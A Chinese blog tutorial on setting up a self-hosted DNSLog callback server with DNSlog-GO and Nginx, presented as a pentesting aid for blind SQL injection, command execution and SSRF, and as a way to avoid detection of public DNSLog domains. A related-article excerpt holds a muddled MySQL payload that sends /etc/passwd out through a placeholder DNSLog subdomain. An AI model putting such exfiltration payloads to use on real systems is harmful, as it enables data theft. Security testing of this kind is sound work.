个人DNSLog平台搭建

最新推荐文章于 2025-06-06 20:19:42 发布
最新推荐文章于 2025-06-06 20:19:42 发布
阅读量2.7k 收藏 8
点赞数 3
CC 4.0 BY-SA版权
文章标签: 服务器 linux nginx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ShangYaoPaiGu/article/details/128228993

0x01 前言

搭建一个DNSLog平台需要准备以下:

  • 购买一个合法域名
  • 具有公网IP的服务器

我使用的是阿里云ECS服务器(Linux)、阿里云域名解析服务,其他平台类似。

我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,

就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,

这样就可以访问127.0.0.1服务器上的相应服务。

DNSlog就是存储在DNS服务器上的域名信息,

它记录着用户对域名 www.baidu.com 等的访问信息,类似日志文件。

0x02 域名解析配置

  1. 首先在域名解析中添加一条A记录,记录值为服务器公网IP:

image-20220718185553960

  1. 创建NS记录,记录值为上一步创建的A记录:

image-20220718185748098

  1. 在域名控制台设置自定义DNS Host,创建DNS服务器:

image-20220718185954758

0x03 云服务器配置

  1. 下载DNSLog平台到服务器

GitHub地址: https://github.com/lanyi1998/DNSlog-GO.git

在服务器中输入

wget https://github.com/lanyi1998/DNSlog-GO/releases/download/1.5.2/DNSlog-GO-linux.zip
  1. 解压
unzip DNSlog-GO-linux.zip
  1. 进入目录后使用screen保证DNSLog平台可以在后台运行
# 没有安装screen可以通过包管理器安装,已安装则跳过
yum install screen #Centos
apt-get install screen #Ubuntu
  1. 创建新的screen,使用该命令后会自动进入该screen:
screen -S dnslog
  1. 修改配置文件config.yaml
HTTP:
  port: 8000
  #{"token":"用户对应子域名"}
  user: { "password": "dnslog" }
  consoleDisable: false
Dns:
  domain: q1jun.cn
  1. 启动DNSLog平台:
sudo chmod +x ./main
./main
  1. 在ECS服务器控制台->安全组,开放53(UDP)和8000(TCP)端口。
  2. 浏览器输入IP:8000进入DNSLog平台,根据提示输入设置的tokenpassword即可进入。

0x04 Nginx配置(可选)

由于本人不喜欢通过IP+端口或者域名+端口的方式访问页面,我一般通过Nginx的方向代理转发端口,这样做的好处是不需要在在ECS服务器控制台->安全组开放8000端口,在访问的时候不需要记住端口号,也不怕被人扫端口。

  1. Nginx配置:
server {
    listen       80;
    server_name  dns.q1jun.cn; #新建的A记录
    access_log  /var/log/nginx/dnslog.access.log  main;
    root /usr/share/nginx/html;
    location / {
    	proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    	proxy_set_header Host $http_host;
    	proxy_redirect off;
    	proxy_pass http://127.0.0.1:8000; #转发端口

    	# 如果您要使用本地存储策略,请将下一行注释符删除,并更改大小为理论最大文件尺寸
    	client_max_body_size 20000m;
    }
    error_page  404              /404.html;

    # redirect server error pages to the static page /50x.html
    #
    error_page   500 502 503 504  /50x.html;
    location = /50x.html {
        root   /usr/share/nginx/html;
    }
}

  1. 在域名云解析DNS中添加一条A记录:dns.q1jun.cn作为访问DNSLog平台的域名。

  2. 重启nginx

nginx -s reload

搭建成功:

image-20220718192506966

q1jun
关注
[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(4-1)SQL注入相关面试题
qq_51577576的博客
11-18 2795
渗透测试面试题 渗透方向的岗位,涉及到的知识点是很广泛的。 这里我总结了整个一系列的面试题,可能没有覆盖到全部的知识面,但是应该是比较全面的,本文主讲解web漏洞sql注入方向的面试题。 如果整个系列的问题搞懂了大部分,那找个网安方向的工作基本上没什么问题了。 当然了,可能也不是说这些问题都会被问到,但这些题目都是和网安岗位相契合的。
DNSlog平台搭建
m0_51468027的博客
07-12 6714
从0到1搭建DNSlog平台,最后拓展了实现自动化运行DNSlog平台
安全技术|DNSLOG平台搭建从0到1
Jeeseen123的博客
06-24 1770
安全技术|DNSLOG平台搭建从0到1 DNSLOG是一种回显机制,常用于在某些漏洞无法回显但可以发起DNS请求的情况下,利用此方式外带数据,以解决某些漏洞由于无回显而难以利用的问题。主要利用场景有SQL盲注、无回显的命令执行、无回显的SSRF。本文介绍一种搭建DNSLOG平台的方法,旨在为渗透测试提供一些帮助。 前期准备 一个域名,一台vps 本文使用的是:阿里云购买的域名和云服务器ECS 域名:example.icu vps ip:100.100.100.100 实验过程 1.添加DNS解析 在云解析D
自建 dnslog 回显平台:渗透测试场景下的隐蔽回显利器
最新发布
痴人说梦梦中人
06-06 1227
本项目是对 [dnslog.cn](https://dnslog.cn) 平台的简洁克隆,支持自定义域名部署,便于内网渗透测试与痕迹收集,同时绕过部分安全设备对 dnslog.cn 的拦截。
自建DNSlog服务器
一枚小白的分享,不喜勿喷~
07-14 2682
在某些情况下,无法利用漏洞获得回显。但是,如果目标可以发送DNS请求,则可以通过DNS log方式将想获得的数据外带出来。网上公开提供dnslog服务有很多,比如dnslog.cn、知道创宇、三叶草等等,但是这些提供的域名是固定的,现在一些比较大型的企业已经把这些域名也加入到监控范围之中了。如果自建一个dnslog服务,就能很好的规避这种情况。
搭建dnslog、weblog平台
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
09-26 6471
文章目录a、前期准备b、搭建 渗透测试的时候,对于命令注入、反序列化等无回显漏洞,dnslog或者weblog是一个必不可少的平台。 不想搭建,可使用免费版:http://dnslog.cn/,不过有时效限制 下面是我的搭建过程,由于使用了别人做好的docker,所以总体搭建过程较为简单。 a、前期准备 一个公网服务器,一个域名(有的教程说要两个域名,一个足够了),我这里买的都是最低端的,一年总共也就一百来块,足够用了。 下面是我的域名配置: 配置A记录,子域名ns1,解析到 7.7.7.7(你买的公网i
搭建一个自己的dnslog server
热门推荐
leeezp的博客
09-08 32万+
dnslog server 的用途就不用我多说了,log4j,反序列化,各种rce类漏洞都可以用它来测试,但是公网的不稳定且很卡,在渗透中需要自己的一个稳定的server。部分域名提供商只允许修改 NS 记录为已经认证过的 NS 地址。所以需要找一个支持修改 NS 记录为自己 NS 的域名提供商。如果你需要内网的dns server,建议搭建dnsmasq。cloudflare 里有cdn,有一定隐藏ip作用。0x02 其他 dns server。
快速搭建自用dnslog
寒星的博客
04-21 5100
快速搭建自用dnslog 前言 dnslog是常见的辅助验证漏洞的手段,为什么要自建dnslog? 第三方dnslog在一些特殊时期会受到一股神秘力量影响变得不稳定甚至不能用 有些业务或者信息不方便使用第三方平台 常见的dnslog平台会被安全产品检测到 网上已经有很多开源的dnslog平台,且有不少的dnslog搭建教程,但是看下来感觉还是有点麻烦,而且不容易集成到自己平台。对于个人来说,很多步骤其实是可以省略的。前几天原来的dnslog的域名到期了,又重新买了个新的重新搭建了一次。正好分享一下我是如
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 2906
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
dnslog服务器搭建指导
鹿鸣天涯
09-11 777
申请云服务器时, 自带一个公网ip, 但是这个公网ip没有绑定在本地的网卡中, 安装interactsh会有问题, dnslog无法正常使用, 需要额外再绑定一个公网ip, 才可以保证dnslog正常使用。一个云服务器绑定了新的公网ip, 则原来的公网ip就没有办法使用了, 还会导致主机连接不上的风险, 摸索过程中, 暂时没有一个很成熟的方案。有一台自己的云服务器(注意: 建议申请海外的云服务器, 笔者在搭建的过程中发现使用国内的服务器搭建网站需要备案,流程比较复杂)将域名和步骤3的公网ip绑定。
sqlmap结合dnslog外带注入
newlife1441的博客
08-05 777
目录📓前言📓操作步骤1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置2.环境准备2.1Windows server2008 2.1.1搭建dns服务器2.2测试2.2.1设置靶机的网络的dns为server20082.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 2.2.3server2008中创建转发器2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况2.3开始sqlmap使用dnslog外带注入2.3...
利用DNSLOG注入突破无回显盲注
SheXinK’s Blog
12-19 1081
利用DNSLOG注入突破无回显盲注1、 SQL注入介绍2、 盲注PHP代码3、 DNSLOG注入测试4、 代码漏洞修复 1、 SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因:web应用程序对用户输入数据的合法性没有判断或过滤不严,导致恶意payload直接带入SQL语句执行,从而执行payload中非法操作! 2、 盲注PHP代码   新建PHP文件,将下面代码复制到PHP文...
DNSLog-Platform-Golang:DNSLOG平台golang一键启动版
04-02
DNSLog-平台-Golang 相信DNSLog平台已经是安全从业者的标配。而公开的DNSLOG平台域名早已进入流量监控设备的规则库。同时也有重大问题值得关注。于是撸了(凑了)一个一键建造Dnslog平台的golang版本。可以使用其一键构造自己的Dnslog平台。由于是作者的第一个golang程序,难免会有一些小问题。不过他真的是一键! 部署 克隆或者下载本仓库到你的服务器上 不多说。 决定是否开放公网访问? 倒数第几行中的http.ListenAndServe("localhost:8000", nil) ,这样写的话只能通过本地主机进行访问,墙裂建议不要修改,而后通过中间件反向代理后对外开放,方便做访问控制,日志管理等。如果想直接对外开放的话可以修改为: http.ListenAndServe(":8000", nil) 域名准备 做好NS指向即可。不会检查请看后文 尝试运行 ~~
Apache Log4j2 漏洞详谈
infosec的博客
12-16 5954
源于Apache Log4j2这个漏洞的描述很多,也有很多的解法。开这个博的目的就是想分析一下漏洞具体是如何被利用的,这个大黑锅下面都有哪些坑。 最近由阿里安全团队爆出来的Apache Log4j2漏洞,可以说是霸占了大部分网安人的朋友圈。同时一张热图也被传来传去,就是下面这个图片。 由于Apache Log4j2组件应用的普及性,导致了大部分的应用都受到波及。同时我们也需要知道并不是所有的log功能都是通过Apache Log4j2来实现的,其实我们还有很多选择。众所周知Log4j2是Apache 家的
阿里云域名搭建DNSLOG
qq_36226141的博客
07-19 2966
阿里云域名搭建DNSLOG
分享一个dnslog在线平台
2301_76297780的博客
06-19 820
分享一个dnslog在线平台
dnslog在线平台
Lucker_YYY的博客
08-29 1218
分享几个好用的在线平台
tornado项目搭建_安全技术|DNSLOG平台搭建从0到1
weixin_39636057的博客
12-22 164
点击上方蓝字关注我们DNSLOG是一种回显机制,常用于在某些漏洞无法回显但可以发起DNS请求的情况下,利用此方式外带数据,以解决某些漏洞由于无回显而难以利用的问题。主要利用场景有SQL盲注、无回显的命令执行、无回显的SSRF。本文介绍一种搭建DNSLOG平台的方法,旨在为渗透测试提供一些帮助。前期准备一个域名,一台vps本文使用的是:阿里云购买的域名和云服务器ECS域名:example....
占坑规划——dnslog原理分析&私有搭建
viki1998的博客
06-11 294
盲猜通过访问目标网站的web记录,把request中带的参数在日志中进行检测,10秒一轮 抓到返回ip 时间 正好web日志中间件都可以记录 这些内容 占个坑后续补充。起因:测试某只有发送记录的功能 想到xss平台然后想到dnslog私有化。开始前猜测如何实现 单从dnslog的实现来看。
dnslog平台作用
02-19
### DNSLog平台的功能和用途 DNSLog平台主要用于安全研究和渗透测试领域,其核心功能是在无法通过常规网络流量直接回传数据的情况下,利用DNS查询机制实现信息泄露。当目标系统向特定的子域名发起DNS解析请求时,这些请求会被转发至DNSLog服务器并记录下来。 #### 功能描述 - **注册与配置** 用户需先在支持该服务的网站上创建账户,并获得一个唯一的顶级域(如`example.dnslog.cn`),用于后续操作中的唯一标识[^1]。 - **数据收集** 渗透测试人员可以构造特殊的URL或其他形式的数据包,使得目标机器尝试访问由上述个人专属子域名构成的内容。由于大多数防火墙不会阻止对外部公共DNS服务器的标准端口53上的通信,因此即使在网络受限环境中也能成功触发外部连接[^2]。 - **日志审查** 所有经由此方式产生的DNS查询都会被集中存储于用户的私人控制面板内供查阅。这允许研究人员轻松追踪任何企图联系指定主机的行为模式及其携带的信息片段——比如文件路径、参数值甚至是完整的HTTP头部字段等敏感资料。 #### 应用场景举例 对于SQL注入漏洞而言,在某些情况下数据库返回的结果可能不便于直接显示给客户端浏览器;此时借助DNSLog则可以通过精心设计payload让受害站点执行带有恶意命令字符串的语句,进而间接地把内部状态反馈出来以便进一步分析确认是否存在可利用之处。 ```sql IF (SELECT ASCII(SUBSTRING(@@version,1,1))) > 0 THEN SLEEP(5); ELSE SELECT LOAD_FILE(CONCAT('\\\\', 'your-dnslog-subdomain.here','/etc/passwd')); END IF; ``` 此代码段展示了如何在一个假设性的MySQL环境中实施基于时间延迟判断版本号首位字符是否大于零的同时尝试读取远程Linux系统的密码文件并通过DNS请求将其部分或全部内容传递出去。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值